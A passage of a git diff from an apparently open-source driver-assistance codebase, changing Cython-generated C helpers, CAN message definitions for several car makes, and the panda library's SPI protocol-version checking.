+#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_CheckExact(b))) { + if (sizeof(Py_ssize_t) >= sizeof(long)) + return PyInt_AS_LONG(b); + else + return PyInt_AsSsize_t(b); + } +#endif + if (likely(PyLong_CheckExact(b))) { + #if CYTHON_USE_PYLONG_INTERNALS + if (likely(__Pyx_PyLong_IsCompact(b))) { + return __Pyx_PyLong_CompactValue(b); + } else { + const digit* digits = __Pyx_PyLong_Digits(b); + const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(b); + switch (size) { + case 2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return (Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + } + } + #endif + return PyLong_AsSsize_t(b); + } + x = PyNumber_Index(b); + if (!x) return -1; + ival = PyInt_AsSsize_t(x); + Py_DECREF(x); + return ival; +} +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject* o) { + if (sizeof(Py_hash_t) == sizeof(Py_ssize_t)) { + return (Py_hash_t) __Pyx_PyIndex_AsSsize_t(o); +#if PY_MAJOR_VERSION < 3 + } else if (likely(PyInt_CheckExact(o))) { + return PyInt_AS_LONG(o); +#endif + } else { + Py_ssize_t ival; + PyObject *x; + x = PyNumber_Index(o); + if (!x) return -1; + ival = PyInt_AsLong(x); + Py_DECREF(x); + return ival; + } +} +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b) { + return b ? __Pyx_NewRef(Py_True) : __Pyx_NewRef(Py_False); +} +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t ival) { + return PyInt_FromSize_t(ival); +} + + +/* #### Code section: utility_code_pragmas_end ### */ +#ifdef _MSC_VER +#pragma warning( pop ) +#endif + + + +/* #### Code section: end ### */ +#endif /* Py_PYTHON_H */ diff --git a/opendbc/can/parser_pyx.so b/opendbc/can/parser_pyx.so index 33e36596b..799140a93 100755 Binary files a/opendbc/can/parser_pyx.so and b/opendbc/can/parser_pyx.so differ diff --git a/opendbc/hyundai_kia_generic.dbc b/opendbc/hyundai_kia_generic.dbc index f554b7fb1..f1af8f9d2 100644 --- a/opendbc/hyundai_kia_generic.dbc +++ b/opendbc/hyundai_kia_generic.dbc @@ -1640,6 +1640,8 @@ BO_ 1042 ICM_412h: 8 ICM BO_ 1348 Navi_HU: 8 XXX SG_ SpeedLim_Nav_Clu : 7|8@0+ (1,0) [0|255] "" XXX + SG_ SpeedLim_Nav_General : 29|1@0+ (1,0) [0|1] "" XXX + SG_ SpeedLim_Nav_Cam : 30|1@0+ (1,0) [0|1] "" XXX CM_ "BO_ E_EMS11: All (plug-in) hybrids use this gas signal: CR_Vcu_AccPedDep_Pos, and all EVs use the Accel_Pedal_Pos signal. See hyundai/values.py for a specific car list"; CM_ SG_ 871 CF_Lvr_IsgState "Idle Stop and Go"; diff --git a/opendbc/mazda_2017.dbc b/opendbc/mazda_2017.dbc index 5a5c40ef0..339894659 100644 --- a/opendbc/mazda_2017.dbc +++ b/opendbc/mazda_2017.dbc @@ -167,21 +167,6 @@ BO_ 581 CAM_IDK3: 8 XXX SG_ S8 : 48|8@1+ (1,0) [0|255] "" XXX SG_ S9 : 56|8@1+ (1,0) [0|255] "" XXX -BO_ 585 CAM_LKAS2: 8 XXX - SG_ LKAS_REQUEST : 3|12@0+ (1,-2048) [0|2048] "" XXX - SG_ CHKSUM : 19|12@0+ (1,-2048) [0|2048] "" XXX - SG_ KEY : 39|32@0+ (1,0) [3294744159|3294744161] "" XXX - -BO_ 586 TI_FEEDBACK: 8 XXX - SG_ TI_TORQUE_SENSOR : 7|8@0+ (1,-127) [-85|85] "" XXX - SG_ CHKSUM : 15|8@0+ (1,-127) [-127|128] "" XXX - SG_ VERSION_NUMBER : 23|8@0+ (1,0) [0|255] "" XXX - SG_ STATE : 31|8@0+ (1,0) [0|3] "" XXX - SG_ VIOL : 39|8@0+ (1,0) [0|255] "" XXX - SG_ ERROR : 47|8@0+ (1,0) [0|255] "" XXX - SG_ RAMP_DOWN : 55|8@0+ (1,0) [0|1] "" XXX - SG_ SPARE : 63|8@0+ (1,0) [0|255] "" XXX - BO_ 863 CAM_TRAFFIC_SIGNS: 8 XXX SG_ NEW_SIGNAL_3 : 55|1@0+ (1,0) [0|127] "" XXX SG_ FORWARD_COLLISION : 40|8@1+ (1,0) [0|7] "" XXX diff --git a/opendbc/subaru_global_2017_generated.dbc b/opendbc/subaru_global_2017_generated.dbc index 9b7f9a642..e85509eb8 100644 --- a/opendbc/subaru_global_2017_generated.dbc +++ b/opendbc/subaru_global_2017_generated.dbc @@ -87,10 +87,14 @@ BO_ 314 Wheel_Speeds: 8 XXX SG_ FL : 51|13@1+ (0.057,0) [0|255] "kph" XXX SG_ RL : 38|13@1+ (0.057,0) [0|255] "kph" XXX -BO_ 280 STOP_START: 8 XXX +BO_ 280 Steering_Torque_2: 8 XXX SG_ CHECKSUM : 0|8@1+ (1,0) [0|255] "" XXX SG_ COUNTER : 8|4@1+ (1,0) [0|15] "" XXX - SG_ State : 63|1@1+ (1,0) [0|1] "" XXX + SG_ Steer_Torque_Output : 13|11@1- (-10,0) [0|255] "" XXX + SG_ Signal1 : 24|8@1+ (1,0) [0|511] "" XXX + SG_ Steer_Torque_Sensor : 45|11@1- (-1,0) [0|255] "" XXX + SG_ Steering_Active : 61|1@0+ (1,0) [0|1] "" XXX + SG_ Steering_Disabled : 63|1@1+ (1,0) [0|1] "" XXX BO_ 281 Steering_Torque: 8 XXX SG_ CHECKSUM : 0|8@1+ (1,0) [0|255] "" XXX @@ -102,6 +106,11 @@ BO_ 281 Steering_Torque: 8 XXX SG_ Steering_Angle : 32|16@1- (-0.0217,0) [-600|600] "" X SG_ Steer_Torque_Output : 48|11@1- (-10,0) [-1000|1000] "" XXX +BO_ 282 Steering_2: 8 XXX + SG_ CHECKSUM : 0|8@1+ (1,0) [0|1] "" XXX + SG_ COUNTER : 8|4@1+ (1,0) [0|1] "" XXX + SG_ Steering_Angle : 24|17@1- (-0.01,0) [0|1] "" XXX + BO_ 312 Brake_Pressure_L_R: 8 XXX SG_ CHECKSUM : 0|8@1+ (1,0) [0|255] "" XXX SG_ COUNTER : 8|4@1+ (1,0) [0|15] "" XXX @@ -131,6 +140,13 @@ BO_ 290 ES_LKAS: 8 XXX SG_ LKAS_Output : 16|13@1- (-1,0) [-8191|8191] "" XXX SG_ LKAS_Request : 29|1@0+ (1,0) [0|1] "" XXX +BO_ 292 ES_LKAS_ANGLE: 8 XXX + SG_ CHECKSUM : 0|8@1+ (1,0) [0|1] "" XXX + SG_ COUNTER : 8|4@1+ (1,0) [0|1] "" XXX + SG_ LKAS_Request : 12|1@1+ (1,0) [0|1] "" XXX + SG_ LKAS_Output : 40|17@1- (-0.01,0) [0|1] "deg" XXX + SG_ SET_3 : 60|2@1+ (1,0) [0|1] "" XXX + BO_ 544 ES_Brake: 8 XXX SG_ CHECKSUM : 0|8@1+ (1,0) [0|255] "" XXX SG_ COUNTER : 8|4@1+ (1,0) [0|15] "" XXX diff --git a/opendbc/toyota_new_mc_pt_generated.dbc b/opendbc/toyota_new_mc_pt_generated.dbc index c65734c4a..476e70f31 100644 --- a/opendbc/toyota_new_mc_pt_generated.dbc +++ b/opendbc/toyota_new_mc_pt_generated.dbc @@ -41,11 +41,6 @@ BO_ 767 SDSU: 8 XXX CM_ "BO_ SDSU: The sDSU is a modified DSU for use in TSS1 Toyotas. Learn more: https://github.com/wocsor/panda/tree/smart_dsu"; CM_ SG_ 767 FD_BUTTON "The follow distance button signal as forwarded by the sdsu"; -BO_ 1880 DEBUG: 8 XXX - SG_ BLINDSPOTSIDE : 7|8@0+ (1,0) [0|255] "" XXX - SG_ BLINDSPOT : 38|1@0+ (1,0) [0|15] "" XXX - SG_ BLINDSPOTD1 : 47|8@0+ (1,0) [0|255] "" XXX - SG_ BLINDSPOTD2 : 55|8@0+ (1,0) [0|255] "" XXX CM_ "Imported file _toyota_2017.dbc starts here"; VERSION "" @@ -250,6 +245,7 @@ BO_ 956 GEAR_PACKET: 8 XXX SG_ SPORT_GEAR_ON : 33|1@0+ (1,0) [0|1] "" XXX SG_ SPORT_GEAR : 38|3@0+ (1,0) [0|7] "" XXX SG_ ECON_ON : 40|1@0+ (1,0) [0|1] "" XXX + SG_ SPORT_ON_2 : 55|1@0+ (1,0) [0|1] "" XXX SG_ B_GEAR_ENGAGED : 41|1@0+ (1,0) [0|1] "" XXX SG_ DRIVE_ENGAGED : 47|1@0+ (1,0) [0|1] "" XXX @@ -315,6 +311,11 @@ BO_ 1043 TIME : 8 CGW SG_ GMTDIFF_MINUTES : 50|6@0+ (1,0) [0|0] "minutes" XXX SG_ SUMMER : 60|1@0+ (1,0) [0|0] "" XXX +BO_ 1044 AUTO_HIGH_BEAM: 8 FCM + SG_ AHB_DUTY : 47|8@0+ (0.5,0) [0|0] "%" Vector__XXX + SG_ F_AHB : 55|4@0+ (1,0) [0|0] "" Vector__XXX + SG_ C_AHB : 51|4@0+ (1,0) [0|0] "" Vector__XXX + BO_ 1083 AUTOPARK_STATUS: 8 IPAS SG_ STATE : 7|4@0+ (1,0) [0|15] "" XXX @@ -424,6 +425,12 @@ BO_ 1592 DOOR_LOCKS: 8 XXX SG_ LOCK_STATUS : 20|1@0+ (1,0) [0|1] "" XXX SG_ LOCKED_VIA_KEYFOB : 23|1@0+ (1,0) [0|1] "" XXX +BO_ 1880 DEBUG: 8 XXX + SG_ BLINDSPOTSIDE : 7|8@0+ (1,0) [0|255] "" XXX + SG_ BLINDSPOT : 38|1@0+ (1,0) [0|15] "" XXX + SG_ BLINDSPOTD1 : 47|8@0+ (1,0) [0|255] "" XXX + SG_ BLINDSPOTD2 : 55|8@0+ (1,0) [0|255] "" XXX + CM_ SG_ 36 YAW_RATE "verify"; CM_ SG_ 36 STEERING_TORQUE "does not seem the steer torque, tbd"; CM_ SG_ 37 STEER_FRACTION "1/15th of the signal STEER_ANGLE, which is 1.5 deg; note that 0x8 is never set"; @@ -524,6 +531,7 @@ VAL_ 956 GEAR 0 "D" 1 "S" 8 "N" 16 "R" 32 "P"; VAL_ 956 SPORT_GEAR_ON 0 "off" 1 "on"; VAL_ 956 SPORT_GEAR 1 "S1" 2 "S2" 3 "S3" 4 "S4" 5 "S5" 6 "S6"; VAL_ 956 ECON_ON 0 "off" 1 "on"; +VAL_ 956 SPORT_ON_2 0 "off" 1 "on"; VAL_ 956 B_GEAR_ENGAGED 0 "off" 1 "on"; VAL_ 956 DRIVE_ENGAGED 0 "off" 1 "on"; VAL_ 1005 REVERSE_CAMERA_GUIDELINES 3 "No guidelines" 2 "Static guidelines" 1 "Active guidelines"; diff --git a/opendbc/toyota_nodsu_pt_generated.dbc b/opendbc/toyota_nodsu_pt_generated.dbc index a9a547155..37065ab6e 100644 --- a/opendbc/toyota_nodsu_pt_generated.dbc +++ b/opendbc/toyota_nodsu_pt_generated.dbc @@ -41,12 +41,6 @@ BO_ 767 SDSU: 8 XXX CM_ "BO_ SDSU: The sDSU is a modified DSU for use in TSS1 Toyotas. Learn more: https://github.com/wocsor/panda/tree/smart_dsu"; CM_ SG_ 767 FD_BUTTON "The follow distance button signal as forwarded by the sdsu"; -BO_ 1880 DEBUG: 8 XXX - SG_ BLINDSPOTSIDE : 7|8@0+ (1,0) [0|255] "" XXX - SG_ BLINDSPOT : 38|1@0+ (1,0) [0|15] "" XXX - SG_ BLINDSPOTD1 : 47|8@0+ (1,0) [0|255] "" XXX - SG_ BLINDSPOTD2 : 55|8@0+ (1,0) [0|255] "" XXX - CM_ "Imported file _toyota_2017.dbc starts here"; VERSION "" @@ -317,6 +311,11 @@ BO_ 1043 TIME : 8 CGW SG_ GMTDIFF_MINUTES : 50|6@0+ (1,0) [0|0] "minutes" XXX SG_ SUMMER : 60|1@0+ (1,0) [0|0] "" XXX +BO_ 1044 AUTO_HIGH_BEAM: 8 FCM + SG_ AHB_DUTY : 47|8@0+ (0.5,0) [0|0] "%" Vector__XXX + SG_ F_AHB : 55|4@0+ (1,0) [0|0] "" Vector__XXX + SG_ C_AHB : 51|4@0+ (1,0) [0|0] "" Vector__XXX + BO_ 1083 AUTOPARK_STATUS: 8 IPAS SG_ STATE : 7|4@0+ (1,0) [0|15] "" XXX @@ -426,6 +425,12 @@ BO_ 1592 DOOR_LOCKS: 8 XXX SG_ LOCK_STATUS : 20|1@0+ (1,0) [0|1] "" XXX SG_ LOCKED_VIA_KEYFOB : 23|1@0+ (1,0) [0|1] "" XXX +BO_ 1880 DEBUG: 8 XXX + SG_ BLINDSPOTSIDE : 7|8@0+ (1,0) [0|255] "" XXX + SG_ BLINDSPOT : 38|1@0+ (1,0) [0|15] "" XXX + SG_ BLINDSPOTD1 : 47|8@0+ (1,0) [0|255] "" XXX + SG_ BLINDSPOTD2 : 55|8@0+ (1,0) [0|255] "" XXX + CM_ SG_ 36 YAW_RATE "verify"; CM_ SG_ 36 STEERING_TORQUE "does not seem the steer torque, tbd"; CM_ SG_ 37 STEER_FRACTION "1/15th of the signal STEER_ANGLE, which is 1.5 deg; note that 0x8 is never set"; @@ -545,9 +550,9 @@ VAL_ 1042 LDA_FRONT_CAMERA_BLOCKED 1 "lda unavailable" 0 "ok"; VAL_ 1042 TAKE_CONTROL 1 "take control" 0 "ok"; VAL_ 1042 LANE_SWAY_WARNING 3 "ok" 2 "orange please take a break" 1 "prompt would you like to take a break" 0 "ok"; VAL_ 1042 LANE_SWAY_BUZZER 3 "ok" 2 "beep twice" 1 "beep twice" 0 "ok"; -VAL_ 1161 TSGN1 36 "speed sign mph" 1 "speed sign kph" 0 "none"; +VAL_ 1161 TSGN1 1 "speed sign" 0 "none"; VAL_ 1161 TSGN2 1 "speed sign" 0 "none"; -VAL_ 1161 SPLSGN2 15 "conditional blank" 6 "snow" 5 "rain" 4 "wet road" 5 "rain" 3 "left" 2 "right" 1 "time" 0 "none"; +VAL_ 1161 SPLSGN2 15 "conditional blank" 4 "wet road" 5 "rain" 0 "none"; VAL_ 1162 TSGN3 0 "none" 1 "speed sign" 2 "0 unlimited" 7 "unlimited" 16 "highway" 17 "no highway" 18 "motorway" 19 "no motorway" 20 "in city" 21 "outside city" 22 "pedestrian area" 23 "no pedestrian area" 65 "no overtaking left" 66 "no overtaking right" 67 "overtaking allowed again" 81 "no right turn" 97 "stop" 105 "yield" 113 "stop" 114 "yield us" 129 "no entry" 138 "no entry tss2" 145 "do not enter"; VAL_ 1162 SPLSGN3 15 "conditional blank" 4 "wet road" 5 "rain" 0 "none"; VAL_ 1552 METER_SLIDER_LOW_BRIGHTNESS 1 "Low brightness mode, footwell lights off" 0 "Normal mode, footwell lights on"; @@ -568,7 +573,7 @@ BO_ 401 STEERING_LTA: 8 XXX SG_ STEER_ANGLE_CMD : 15|16@0- (0.0573,0) [-540|540] "" XXX SG_ STEER_REQUEST_2 : 25|1@0+ (1,0) [0|1] "" XXX SG_ LKA_ACTIVE : 26|1@0+ (1,0) [0|1] "" XXX - SG_ BIT : 30|1@0+ (1,0) [0|1] "" XXX + SG_ CLEAR_HOLD_STEERING_ALERT : 30|1@0+ (1,0) [0|1] "" XXX SG_ COUNTER : 6|6@0+ (1,0) [0|255] "" XXX SG_ STEER_REQUEST : 0|1@0+ (1,0) [0|1] "" XXX SG_ SETME_X1 : 7|1@0+ (1,0) [0|1] "" XXX @@ -585,6 +590,16 @@ BO_ 610 EPS_STATUS: 8 EPS SG_ TYPE : 24|1@0+ (1,0) [0|1] "" XXX SG_ CHECKSUM : 63|8@0+ (1,0) [0|255] "" XXX +BO_ 881 LTA_RELATED: 8 FCM + SG_ GAS_PEDAL : 15|8@0+ (0.005,0) [0|1] "" XXX + SG_ STEER_ANGLE : 23|16@0- (0.0573,0) [-500|500] "" XXX + SG_ TURN_SIGNALS : 35|2@0+ (1,0) [0|3] "" XXX + SG_ UNKNOWN_2 : 58|1@0+ (1,0) [0|1] "" XXX + SG_ LDA_SA_TOGGLE : 59|1@0+ (1,0) [0|1] "" XXX + SG_ LTA_STEER_REQUEST : 60|1@0+ (1,0) [0|1] "" XXX + SG_ UNKNOWN : 61|1@0+ (1,0) [0|1] "" XXX + SG_ STEERING_PRESSED : 63|1@0+ (1,0) [0|1] "" XXX + BO_ 1014 BSM: 8 XXX SG_ L_ADJACENT : 0|1@0+ (1,0) [0|1] "" XXX SG_ L_APPROACHING : 8|1@0+ (1,0) [0|1] "" XXX @@ -597,13 +612,22 @@ CM_ SG_ 401 PERCENTAGE "driver override percentage (0-100), very close to steeri CM_ SG_ 401 SETME_X64 "ramps to 0 smoothly then back on falling edge of STEER_REQUEST if BIT isn't 1"; CM_ SG_ 401 ANGLE "angle of car relative to lane center on LTA camera"; CM_ SG_ 401 STEER_ANGLE_CMD "desired angle, OEM steers up to 95 degrees, no angle limit but torque will bottom out"; -CM_ SG_ 401 BIT "has correlation to STEER_REQUEST"; +CM_ SG_ 401 CLEAR_HOLD_STEERING_ALERT "set to 1 when user clears LKAS_HUD->LDA_ALERT ('Hold Steering') by applying torque to steering wheel"; CM_ SG_ 401 STEER_REQUEST "enable bit for steering, 1 to steer, 0 to not"; CM_ SG_ 401 STEER_REQUEST_2 "enable bit for steering, 1 to steer, 0 to not"; CM_ SG_ 401 LKA_ACTIVE "1 when using LTA for LKA"; +CM_ SG_ 401 SETME_X1 "usually 1, seen at 0 on some South American Corollas indicating lack of stock Lane Tracing Assist"; +CM_ SG_ 401 SETME_X3 "almost completely correlates with Toyota Safety Sense version, but may instead describe max torque when using LTA. if TSS 2.5 or 2022 RAV4, this is always 1. if TSS 2.0 this is always 3 (or 0 on Alphard, Highlander, NX)"; CM_ SG_ 550 BRAKE_PRESSURE "seems prop to pedal force"; CM_ SG_ 550 BRAKE_POSITION "seems proportional to pedal displacement, unclear the max value of 0x1c8"; CM_ SG_ 610 TYPE "seems 1 on Corolla, 0 on all others"; +CM_ SG_ 881 GAS_PEDAL "not set on all cars, only seen on TSS 2.5 Camry Hybrid so far"; +CM_ SG_ 881 STEER_ANGLE "matches STEER_TORQUE_SENSOR->STEER_ANGLE"; +CM_ SG_ 881 TURN_SIGNALS "flipped on some cars"; +CM_ SG_ 881 LDA_SA_TOGGLE "not applicable for all cars"; +CM_ SG_ 881 LTA_STEER_REQUEST "only applicable for TSS 2.5: matches STEERING_LTA->STEER_REQUEST"; +CM_ SG_ 881 UNKNOWN "related to steering wheel angle"; +CM_ SG_ 881 STEERING_PRESSED "only applicable for TSS 2.5: low sensitivity steering wheel pressed by driver signal"; CM_ SG_ 1014 L_ADJACENT "vehicle adjacent left side of car. enabled above 10mph, regardless of ADJACENT_ENABLED or APPROACHING_ENABLED"; CM_ SG_ 1014 L_APPROACHING "vehicle approaching from left side of car. enabled above 10mph, regardless of ADJACENT_ENABLED or APPROACHING_ENABLED"; CM_ SG_ 1014 R_ADJACENT "vehicle adjacent right side of car. enabled above 10mph, regardless of ADJACENT_ENABLED or APPROACHING_ENABLED"; @@ -611,6 +635,7 @@ CM_ SG_ 1014 R_APPROACHING "vehicle approaching from right side of car. enabled CM_ SG_ 1014 ADJACENT_ENABLED "when BSM is enabled in settings, this is on along with APPROACHING_ENABLED. this controls bsm alert visibility"; CM_ SG_ 1014 APPROACHING_ENABLED "when BSM is enabled in settings, this is on along with ADJACENT_ENABLED. this controls bsm alert visibility"; +VAL_ 401 SETME_X3 3 "TSS 2.0" 1 "TSS 2.5 or 2022 RAV4" 0 "TSS 2.0 on Alphard, Highlander, NX"; VAL_ 610 IPAS_STATE 5 "override" 3 "enabled" 1 "disabled"; VAL_ 610 LKA_STATE 25 "temporary_fault" 17 "permanent_fault" 11 "lka_missing_unavailable2" 9 "temporary_fault2" 5 "active" 3 "lka_missing_unavailable" 1 "standby"; VAL_ 610 LTA_STATE 25 "temporary_fault" 9 "temporary_fault2" 5 "active" 3 "lta_missing_unavailable" 1 "standby"; diff --git a/opendbc/toyota_tnga_k_pt_generated.dbc b/opendbc/toyota_tnga_k_pt_generated.dbc index 8481e19fd..3b6b3c534 100644 --- a/opendbc/toyota_tnga_k_pt_generated.dbc +++ b/opendbc/toyota_tnga_k_pt_generated.dbc @@ -41,11 +41,6 @@ BO_ 767 SDSU: 8 XXX CM_ "BO_ SDSU: The sDSU is a modified DSU for use in TSS1 Toyotas. Learn more: https://github.com/wocsor/panda/tree/smart_dsu"; CM_ SG_ 767 FD_BUTTON "The follow distance button signal as forwarded by the sdsu"; -BO_ 1880 DEBUG: 8 XXX - SG_ BLINDSPOTSIDE : 7|8@0+ (1,0) [0|255] "" XXX - SG_ BLINDSPOT : 38|1@0+ (1,0) [0|15] "" XXX - SG_ BLINDSPOTD1 : 47|8@0+ (1,0) [0|255] "" XXX - SG_ BLINDSPOTD2 : 55|8@0+ (1,0) [0|255] "" XXX CM_ "Imported file _toyota_2017.dbc starts here"; VERSION "" @@ -250,6 +245,7 @@ BO_ 956 GEAR_PACKET: 8 XXX SG_ SPORT_GEAR_ON : 33|1@0+ (1,0) [0|1] "" XXX SG_ SPORT_GEAR : 38|3@0+ (1,0) [0|7] "" XXX SG_ ECON_ON : 40|1@0+ (1,0) [0|1] "" XXX + SG_ SPORT_ON_2 : 55|1@0+ (1,0) [0|1] "" XXX SG_ B_GEAR_ENGAGED : 41|1@0+ (1,0) [0|1] "" XXX SG_ DRIVE_ENGAGED : 47|1@0+ (1,0) [0|1] "" XXX @@ -315,6 +311,11 @@ BO_ 1043 TIME : 8 CGW SG_ GMTDIFF_MINUTES : 50|6@0+ (1,0) [0|0] "minutes" XXX SG_ SUMMER : 60|1@0+ (1,0) [0|0] "" XXX +BO_ 1044 AUTO_HIGH_BEAM: 8 FCM + SG_ AHB_DUTY : 47|8@0+ (0.5,0) [0|0] "%" Vector__XXX + SG_ F_AHB : 55|4@0+ (1,0) [0|0] "" Vector__XXX + SG_ C_AHB : 51|4@0+ (1,0) [0|0] "" Vector__XXX + BO_ 1083 AUTOPARK_STATUS: 8 IPAS SG_ STATE : 7|4@0+ (1,0) [0|15] "" XXX @@ -424,6 +425,12 @@ BO_ 1592 DOOR_LOCKS: 8 XXX SG_ LOCK_STATUS : 20|1@0+ (1,0) [0|1] "" XXX SG_ LOCKED_VIA_KEYFOB : 23|1@0+ (1,0) [0|1] "" XXX +BO_ 1880 DEBUG: 8 XXX + SG_ BLINDSPOTSIDE : 7|8@0+ (1,0) [0|255] "" XXX + SG_ BLINDSPOT : 38|1@0+ (1,0) [0|15] "" XXX + SG_ BLINDSPOTD1 : 47|8@0+ (1,0) [0|255] "" XXX + SG_ BLINDSPOTD2 : 55|8@0+ (1,0) [0|255] "" XXX + CM_ SG_ 36 YAW_RATE "verify"; CM_ SG_ 36 STEERING_TORQUE "does not seem the steer torque, tbd"; CM_ SG_ 37 STEER_FRACTION "1/15th of the signal STEER_ANGLE, which is 1.5 deg; note that 0x8 is never set"; @@ -524,6 +531,7 @@ VAL_ 956 GEAR 0 "D" 1 "S" 8 "N" 16 "R" 32 "P"; VAL_ 956 SPORT_GEAR_ON 0 "off" 1 "on"; VAL_ 956 SPORT_GEAR 1 "S1" 2 "S2" 3 "S3" 4 "S4" 5 "S5" 6 "S6"; VAL_ 956 ECON_ON 0 "off" 1 "on"; +VAL_ 956 SPORT_ON_2 0 "off" 1 "on"; VAL_ 956 B_GEAR_ENGAGED 0 "off" 1 "on"; VAL_ 956 DRIVE_ENGAGED 0 "off" 1 "on"; VAL_ 1005 REVERSE_CAMERA_GUIDELINES 3 "No guidelines" 2 "Static guidelines" 1 "Active guidelines"; diff --git a/panda/.gitignore b/panda/.gitignore index 403d034ee..a3f6520bf 100644 --- a/panda/.gitignore +++ b/panda/.gitignore @@ -1,3 +1,4 @@ +*.tmp *.pyc .*.swp .*.swo diff --git a/panda/__init__.py b/panda/__init__.py index 21e35b9e9..dfb2bbf1c 100644 --- a/panda/__init__.py +++ b/panda/__init__.py @@ -1,5 +1,6 @@ -from .python.constants import McuType, BASEDIR, FW_PATH # noqa: F401 +from .python.constants import McuType, BASEDIR, FW_PATH, USBPACKET_MAX_SIZE # noqa: F401 +from .python.spi import PandaSpiException, PandaProtocolMismatch # noqa: F401 from .python.serial import PandaSerial # noqa: F401 from .python import (Panda, PandaDFU, # noqa: F401 pack_can_buffer, unpack_can_buffer, calculate_checksum, unpack_log, - DLC_TO_LEN, LEN_TO_DLC, ALTERNATIVE_EXPERIENCE, USBPACKET_MAX_SIZE, CANPACKET_HEAD_SIZE) + DLC_TO_LEN, LEN_TO_DLC, ALTERNATIVE_EXPERIENCE, CANPACKET_HEAD_SIZE) diff --git a/panda/board/obj/bootstub.panda.bin b/panda/board/obj/bootstub.panda.bin index 735eb194e..ea06643b9 100755 Binary files a/panda/board/obj/bootstub.panda.bin and b/panda/board/obj/bootstub.panda.bin differ diff --git a/panda/board/obj/panda.bin.signed b/panda/board/obj/panda.bin.signed index a21954662..0029cfcac 100644 Binary files a/panda/board/obj/panda.bin.signed and b/panda/board/obj/panda.bin.signed differ diff --git a/panda/board/obj/panda_h7.bin.signed b/panda/board/obj/panda_h7.bin.signed index 87ad26228..f9ec2372c 100644 Binary files a/panda/board/obj/panda_h7.bin.signed and b/panda/board/obj/panda_h7.bin.signed differ diff --git a/panda/python/__init__.py b/panda/python/__init__.py index 8efcb8915..8d93f8171 100644 --- a/panda/python/__init__.py +++ b/panda/python/__init__.py @@ -17,7 +17,7 @@ from .base import BaseHandle from .constants import FW_PATH, McuType from .dfu import PandaDFU from .isotp import isotp_send, isotp_recv -from .spi import PandaSpiHandle, PandaSpiException +from .spi import PandaSpiHandle, PandaSpiException, PandaProtocolMismatch from .usb import PandaUsbHandle __version__ = '0.0.10' @@ -26,7 +26,6 @@ __version__ = '0.0.10' LOGLEVEL = os.environ.get('LOGLEVEL', 'INFO').upper() logging.basicConfig(level=LOGLEVEL, format='%(message)s') -USBPACKET_MAX_SIZE = 0x40 CANPACKET_HEAD_SIZE = 0x6 DLC_TO_LEN = [0, 1, 2, 3, 4, 5, 6, 7, 8, 12, 16, 20, 24, 32, 48, 64] LEN_TO_DLC = {length: dlc for (dlc, length) in enumerate(DLC_TO_LEN)} @@ -255,6 +254,7 @@ class Panda: FLAG_GM_HW_CAM_LONG = 2 FLAG_FORD_LONG_CONTROL = 1 + FLAG_FORD_CANFD = 2 def __init__(self, serial: Optional[str] = None, claim: bool = True, disable_checks: bool = True): self._connect_serial = serial @@ -326,16 +326,30 @@ class Panda: self.set_power_save(0) @staticmethod - def spi_connect(serial): + def spi_connect(serial, ignore_version=False): # get UID to confirm slave is present and up handle = None spi_serial = None bootstub = None + spi_version = None try: handle = PandaSpiHandle() - dat = handle.controlRead(Panda.REQUEST_IN, 0xc3, 0, 0, 12, timeout=100) - spi_serial = binascii.hexlify(dat).decode() - bootstub = Panda.flasher_present(handle) + + # connect by protcol version + try: + dat = handle.get_protocol_version() + spi_serial = binascii.hexlify(dat[:12]).decode() + pid = dat[13] + if pid not in (0xcc, 0xee): + raise PandaSpiException("invalid bootstub status") + bootstub = pid == 0xee + spi_version = dat[14] + except PandaSpiException: + # fallback, we'll raise a protocol mismatch below + dat = handle.controlRead(Panda.REQUEST_IN, 0xc3, 0, 0, 12, timeout=100) + spi_serial = binascii.hexlify(dat).decode() + bootstub = Panda.flasher_present(handle) + spi_version = 0 except PandaSpiException: pass @@ -345,6 +359,12 @@ class Panda: spi_serial = None bootstub = False + # ensure our protocol version matches the panda + if handle is not None and not ignore_version: + if spi_version != handle.PROTOCOL_VERSION: + err = f"panda protocol mismatch: expected {handle.PROTOCOL_VERSION}, got {spi_version}. reflash panda" + raise PandaProtocolMismatch(err) + return handle, spi_serial, bootstub, None @staticmethod @@ -416,7 +436,7 @@ class Panda: @staticmethod def spi_list(): - _, serial, _, _ = Panda.spi_connect(None) + _, serial, _, _ = Panda.spi_connect(None, ignore_version=True) if serial is not None: return [serial, ] return [] diff --git a/panda/python/base.py b/panda/python/base.py index 5bfa56489..d19a2b861 100644 --- a/panda/python/base.py +++ b/panda/python/base.py @@ -1,5 +1,4 @@ from abc import ABC, abstractmethod -from typing import List from .constants import McuType @@ -24,7 +23,7 @@ class BaseHandle(ABC): ... @abstractmethod - def bulkWrite(self, endpoint: int, data: List[int], timeout: int = TIMEOUT) -> int: + def bulkWrite(self, endpoint: int, data: bytes, timeout: int = TIMEOUT) -> int: ... @abstractmethod diff --git a/panda/python/constants.py b/panda/python/constants.py index 